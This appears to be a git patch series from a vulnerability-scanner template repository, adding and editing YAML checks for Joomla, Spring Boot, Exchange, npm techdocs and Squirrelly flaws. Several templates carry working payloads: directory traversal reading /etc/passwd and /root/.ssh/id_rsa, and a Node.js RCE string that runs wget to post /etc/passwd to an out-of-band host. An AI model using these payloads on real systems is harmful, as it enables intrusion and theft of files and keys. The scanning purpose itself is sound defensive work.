description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange,oob + tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft reference: | - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index e9f4040fdd..3f651bc8b6 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -18,24 +18,12 @@ requests: Host: {{Hostname}} Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + matchers-condition: and matchers: diff --git a/exposed-panels/microsoft-exchange-login.yaml b/exposed-panels/microsoft-exchange-login.yaml deleted file mode 100644 index 1ba8607ba6..0000000000 --- a/exposed-panels/microsoft-exchange-login.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: exchange-login - -info: - name: Microsoft Exchange login page - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6739 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/owa/auth/logon.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Exchange Log In' - - 'Microsoft Exchange - Outlook Web Access' - - type: status - status: - - 200 diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml index f80de92502..b56d705f16 100644 --- a/misconfiguration/aem/aem-groovyconsole.yaml +++ b/misconfiguration/aem/aem-groovyconsole.yaml @@ -15,7 +15,6 @@ requests: headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 matchers-condition: and matchers: diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft-exchange-server-detect.yaml index b89745b772..9cda37125a 100644 --- a/technologies/microsoft-exchange-server-detect.yaml +++ b/technologies/microsoft-exchange-server-detect.yaml @@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect info: name: Microsoft Exchange Server Detect - author: pikpikcu + author: pikpikcu,dhiyaneshDK severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse - description: | - Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + tags: microsoft,exchange,tech requests: - method: GET path: - "{{BaseURL}}/owa/auth/logon.aspx" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: regex regex: - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all + - type: word + words: + - 'Exchange Log In' + - 'Microsoft Exchange - Outlook Web Access' + extractors: - type: kval - part: header kval: - - X-Owa-Version + - X_Owa_Version From e376dc4c445b6b3604c9d8fb6c5d0630855cd085 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 20 Aug 2021 06:54:26 +0700 Subject: [PATCH 1759/4083] Create CVE-2010-1533.yaml --- cves/2010/CVE-2010-1533.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1533.yaml diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml new file mode 100644 index 0000000000..03ef38a6ea --- /dev/null +++ b/cves/2010/CVE-2010-1533.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1533 + +info: + name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12142 + - https://www.cvedetails.com/cve/CVE-2010-1533 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bebb2d882cea66c216bd2f408726ff81d048eef7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 20 Aug 2021 06:58:33 +0700 Subject: [PATCH 1760/4083] Create CVE-2010-2036.yaml --- cves/2010/CVE-2010-2036.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2036.yaml diff --git a/cves/2010/CVE-2010-2036.yaml b/cves/2010/CVE-2010-2036.yaml new file mode 100644 index 0000000000..a43db3b83d --- /dev/null +++ b/cves/2010/CVE-2010-2036.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2036 + +info: + name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/34004 + - https://www.cvedetails.com/cve/CVE-2010-2036 + tags: cve,cve2010,lfi,joomla + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From e6029630f4ce169b1026d489d80433161b169cc0 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 20 Aug 2021 03:08:19 -0400 Subject: [PATCH 1761/4083] Create springboot-info.yaml --- .../springboot/springboot-info.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 misconfiguration/springboot/springboot-info.yaml diff --git a/misconfiguration/springboot/springboot-info.yaml b/misconfiguration/springboot/springboot-info.yaml new file mode 100644 index 0000000000..351873602b --- /dev/null +++ b/misconfiguration/springboot/springboot-info.yaml @@ -0,0 +1,35 @@ +id: springboot-info + +info: + name: Detect Springboot Information page + author: philippedelteil + severity: low + description: Displays app name and version information among others values + tags: springboot + +requests: + - method: GET + path: + - "{{BaseURL}}/info" + - "{{BaseURL}}/actuator/info" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"build"' + - '"artifact"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v2+json" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header From a5c7f36781a272a84c7e160ae0a0acb8d381e489 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 20 Aug 2021 03:12:53 -0400 Subject: [PATCH 1762/4083] Update springboot-env.yaml --- misconfiguration/springboot/springboot-env.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index 3d21191c73..bd51134c8f 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -2,7 +2,7 @@ id: springboot-env info: name: Detect Springboot Env Actuator - author: that_juan_,dwisiswant0,wdahlenb + author: that_juan_,dwisiswant0,wdahlenb,philippedelteil severity: low description: Sensitive environment variables may not be masked tags: springboot,exposure @@ -36,5 +36,6 @@ requests: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" + - "application/vnd.spring-boot.actuator.v2+json" condition: or part: header From de5deeb8bc56dfe3115707abd2d38d0be1cd7e5d Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 20 Aug 2021 14:33:56 +0530 Subject: [PATCH 1763/4083] pulling latest nuclei version --- .github/workflows/template-validate.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index f833bba65f..0f6a2afba2 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -14,15 +14,15 @@ jobs: with: go-version: 1.14 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go +# - name: Cache Go +# id: cache-go +# uses: actions/cache@v2 +# with: +# path: /home/runner/go +# key: ${{ runner.os }}-go - name: Installing Nuclei - if: steps.cache-go.outputs.cache-hit != 'true' +# if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From 13e498a6b5b4b759346bfacf33760f470441ca58 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 20 Aug 2021 14:35:44 +0530 Subject: [PATCH 1764/4083] Enabling cache again --- .github/workflows/template-validate.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 0f6a2afba2..f833bba65f 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -14,15 +14,15 @@ jobs: with: go-version: 1.14 -# - name: Cache Go -# id: cache-go -# uses: actions/cache@v2 -# with: -# path: /home/runner/go -# key: ${{ runner.os }}-go + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go - name: Installing Nuclei -# if: steps.cache-go.outputs.cache-hit != 'true' + if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From e160acb4810defd1df194a7030c639331cc6ddd6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 20 Aug 2021 16:37:22 +0530 Subject: [PATCH 1765/4083] misc updates --- exposures/configs/dbeaver-credentials.yaml | 1 + exposures/configs/firebase-config-exposure.yaml | 4 ---- exposures/files/db-schema.yaml | 7 +------ exposures/tokens/docker/dockercfg.yaml | 7 ++----- vulnerabilities/generic/generic-blind-xxe.yaml | 7 +------ vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml | 5 ----- ...367-disclosure.yaml => comtrend-password-exposure.yaml} | 4 ++-- ...router-disclosure.yaml => netgear-router-exposure.yaml} | 4 ++-- 8 files changed, 9 insertions(+), 30 deletions(-) rename vulnerabilities/other/{comtrend-ct5367-disclosure.yaml => comtrend-password-exposure.yaml} (88%) rename vulnerabilities/other/{netgear-router-disclosure.yaml => netgear-router-exposure.yaml} (93%) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index f1042118c6..ecd3bfa1d3 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -20,6 +20,7 @@ requests: - type: status status: - 200 + - type: word words: - "application/octet-stream" diff --git a/exposures/configs/firebase-config-exposure.yaml b/exposures/configs/firebase-config-exposure.yaml index 344616fa69..3160a6eb2e 100644 --- a/exposures/configs/firebase-config-exposure.yaml +++ b/exposures/configs/firebase-config-exposure.yaml @@ -15,10 +15,6 @@ requests: matchers-condition: and matchers: - - type: word - part: header - words: - - "text/plain" - type: word words: diff --git a/exposures/files/db-schema.yaml b/exposures/files/db-schema.yaml index 86adb0bfa1..9683a57871 100644 --- a/exposures/files/db-schema.yaml +++ b/exposures/files/db-schema.yaml @@ -5,6 +5,7 @@ info: author: geeknik severity: info description: This file is auto-generated from the current state of the database. + tags: exposure,backup requests: - method: GET @@ -22,12 +23,6 @@ requests: - "ActiveRecord::Schema.define" condition: and - - type: word - part: header - words: - - "text/html" - negative: true - - type: status status: - 200 diff --git a/exposures/tokens/docker/dockercfg.yaml b/exposures/tokens/docker/dockercfg.yaml index 78974e1adb..19533b6ff0 100644 --- a/exposures/tokens/docker/dockercfg.yaml +++ b/exposures/tokens/docker/dockercfg.yaml @@ -11,13 +11,10 @@ requests: - method: GET path: - "{{BaseURL}}/.dockercfg" + - "{{BaseURL}}/.docker/config.json" matchers-condition: and matchers: - - type: word - part: header - words: - - "text/plain" - type: word words: @@ -27,4 +24,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml index f88705f494..e061bbc2a0 100644 --- a/vulnerabilities/generic/generic-blind-xxe.yaml +++ b/vulnerabilities/generic/generic-blind-xxe.yaml @@ -11,14 +11,9 @@ requests: - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip,deflate Referer: {{BaseURL}} - Content-Type: text/xml - Content-Length: 112 - Connection: close + diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml index 8f5fe418de..b09815f5c8 100644 --- a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml +++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -13,10 +13,6 @@ requests: POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 305 @@ -28,7 +24,6 @@ requests: - matchers-condition: and matchers: - type: word part: interactsh-protocol diff --git a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml similarity index 88% rename from vulnerabilities/other/comtrend-ct5367-disclosure.yaml rename to vulnerabilities/other/comtrend-password-exposure.yaml index a69cfc9e55..d45499f302 100644 --- a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml @@ -1,11 +1,11 @@ -id: comtrend-ct5367-rce +id: comtrend-passsword-exposure info: name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution author: geeknik severity: high reference: https://www.exploit-db.com/exploits/16275 - tags: router,disclosure + tags: router,exposure,iot requests: - method: GET diff --git a/vulnerabilities/other/netgear-router-disclosure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml similarity index 93% rename from vulnerabilities/other/netgear-router-disclosure.yaml rename to vulnerabilities/other/netgear-router-exposure.yaml index e0e1dc8085..56ce9127ff 100644 --- a/vulnerabilities/other/netgear-router-disclosure.yaml +++ b/vulnerabilities/other/netgear-router-exposure.yaml @@ -1,4 +1,4 @@ -id: netgear-router-disclosure +id: netgear-router-exposure info: name: Netgear Router S/N Disclosure @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/exploits/45741 author: geeknik severity: critical - tags: netgear,disclosure,iot + tags: netgear,exposure,iot requests: - method: GET From daba2e2a48dddb9ffc9c5f78f3e3f927f2f49153 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Fri, 20 Aug 2021 15:46:10 +0300 Subject: [PATCH 1766/4083] Fixed typo in referenced template name Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- workflows/azkaban-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index ae922a4ec9..e97f2aa339 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -10,4 +10,4 @@ workflows: - template: exposed-panels/azkaban-web-client.yaml subtemplates: - - template: default-logins/azkaban/azkaban-web-client-defaulr-creds.yaml \ No newline at end of file + - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml \ No newline at end of file From 54737d21bf2b7c4f08bc1e5cbda8b81304f45c19 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 20 Aug 2021 18:46:19 +0530 Subject: [PATCH 1767/4083] pulling latest version of nuclei --- .github/workflows/template-validate.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index f833bba65f..0f6a2afba2 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -14,15 +14,15 @@ jobs: with: go-version: 1.14 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go +# - name: Cache Go +# id: cache-go +# uses: actions/cache@v2 +# with: +# path: /home/runner/go +# key: ${{ runner.os }}-go - name: Installing Nuclei - if: steps.cache-go.outputs.cache-hit != 'true' +# if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From 611d5f76ddc2dc603b1e10224337f6f25fd47648 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 20 Aug 2021 20:19:00 +0700 Subject: [PATCH 1768/4083] Create CVE-2021-32819.yaml --- cves/2021/CVE-2021-32819.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-32819.yaml diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml new file mode 100644 index 0000000000..45ee0e2a5f --- /dev/null +++ b/cves/2021/CVE-2021-32819.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-32819 + +info: + name: Nodejs squirrelly RCE + author: pikpikcu + severity: critical + description: | + Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration + options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is + currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023. + reference: | + - https://www.linuxlz.com/aqld/2331.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32819 + tags: cve,cve2021,nodejs,rce + +requests: + - method: GET + path: + - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20--post-file%20/etc/passwd%20{{interactsh-url}}%27);' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" From cbdef618f38bc4b5078d9bba628a0463508acd6d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 00:38:54 +0530 Subject: [PATCH 1769/4083] Update netgear-router-exposure.yaml --- vulnerabilities/other/netgear-router-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/netgear-router-exposure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml index 56ce9127ff..63063665dd 100644 --- a/vulnerabilities/other/netgear-router-exposure.yaml +++ b/vulnerabilities/other/netgear-router-exposure.yaml @@ -21,6 +21,7 @@ requests: status: - 200 - 501 + condition: or - type: word words: From 91a429c5d186940898de62f5379a72c0bc4b5abf Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 01:12:52 +0530 Subject: [PATCH 1770/4083] minor update --- cves/2021/CVE-2021-32819.yaml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 45ee0e2a5f..3b08cefdd4 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -1,26 +1,26 @@ id: CVE-2021-32819 info: - name: Nodejs squirrelly RCE + name: Nodejs squirrelly template engine RCE author: pikpikcu severity: critical description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023. - reference: | + reference: + - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/ - https://www.linuxlz.com/aqld/2331.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32819 - tags: cve,cve2021,nodejs,rce + - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 + tags: cve,cve2021,nodejs,rce,oob requests: - method: GET path: - - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20--post-file%20/etc/passwd%20{{interactsh-url}}%27);' + - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//' - matchers: + matchers: - type: word - part: interactsh_protocol + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" - - "dns" + - "http" \ No newline at end of file From d3552cc6e32e6b9e4c70b642dd59eac4ff28180d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 01:20:10 +0530 Subject: [PATCH 1771/4083] Update springboot-info.yaml --- misconfiguration/springboot/springboot-info.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/springboot/springboot-info.yaml b/misconfiguration/springboot/springboot-info.yaml index 351873602b..c863ce09b9 100644 --- a/misconfiguration/springboot/springboot-info.yaml +++ b/misconfiguration/springboot/springboot-info.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/info" - "{{BaseURL}}/actuator/info" + matchers-condition: and matchers: - type: word From 3ba3b9ac4212760989db21f70dd809475c71c82c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:42:01 +0530 Subject: [PATCH 1772/4083] Create npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml new file mode 100644 index 0000000000..b6385dd3e8 --- /dev/null +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -0,0 +1,26 @@ +id: npm-techdocs-common + +info: + name: NPM - techdocs-common - Directory Traversal + author: dhiyaneshDk + severity: high + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN OPENSSH PRIVATE KEY" + - "BEGIN PRIVATE KEY" + - "BEGIN RSA PRIVATE KEY" + condition: or + + - type: status + status: + - 200 + From 7863c1fdb97687042107601f8cadeb5c2749e958 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:44:03 +0530 Subject: [PATCH 1773/4083] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index b6385dd3e8..fbaed9e23a 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,12 +5,10 @@ info: author: dhiyaneshDk severity: high tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or - - type: status status: - 200 From 1f5edde716bf4dadef62abd686c088fd28fd3060 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 21 Aug 2021 01:46:28 +0530 Subject: [PATCH 1774/4083] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index fbaed9e23a..d5f308a715 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" matchers-condition: and matchers: - type: word @@ -20,4 +20,3 @@ requests: - type: status status: - 200 - From b521701607bba8a5f890845e4c389468565e85e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 01:52:54 +0530 Subject: [PATCH 1775/4083] Update npm-techdocs-common.yaml --- vulnerabilities/other/npm-techdocs-common.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml index d5f308a715..25df5e032b 100644 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ b/vulnerabilities/other/npm-techdocs-common.yaml @@ -5,10 +5,12 @@ info: author: dhiyaneshDk severity: high tags: config,exposure + requests: - method: GET path: - -"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - "BEGIN PRIVATE KEY" - "BEGIN RSA PRIVATE KEY" condition: or + - type: status status: - 200 From 357b478e52df3b7a35d4bc9f7d639190a3a7ba5c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 21 Aug 2021 02:30:02 +0530 Subject: [PATCH 1776/4083] =?UTF-8?q?Update=20and=20rename=20CVE-2017?= =?UTF-8?q?=E2=80=934011.yaml=20to=20CVE-2017-4011.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2017/{CVE-2017–4011.yaml => CVE-2017-4011.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename cves/2017/{CVE-2017–4011.yaml => CVE-2017-4011.yaml} (98%) diff --git a/cves/2017/CVE-2017–4011.yaml b/cves/2017/CVE-2017-4011.yaml similarity index 98% rename from cves/2017/CVE-2017–4011.yaml rename to cves/2017/CVE-2017-4011.yaml index a36bc6ec8d..23b1ffb9b3 100644 --- a/cves/2017/CVE-2017–4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -1,4 +1,4 @@ -id: CVE-2017–4011 +id: CVE-2017-4011 info: name: McAfee NDLP User-Agent XSS From 722646d37e5ad584249481c32257cafbd5720e6b Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 21 Aug 2021 02:44:16 +0530 Subject: [PATCH 1777/4083] strict matchers --- cves/2019/CVE-2019-16313.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index 4acbe787fc..99cb3e5986 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -8,7 +8,7 @@ info: reference: | - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 - tags: cve,cve2019,lfi + tags: cve,cve2019,exposure,router,iot requests: - method: GET @@ -17,12 +17,10 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'user' - - 'pwd' + - 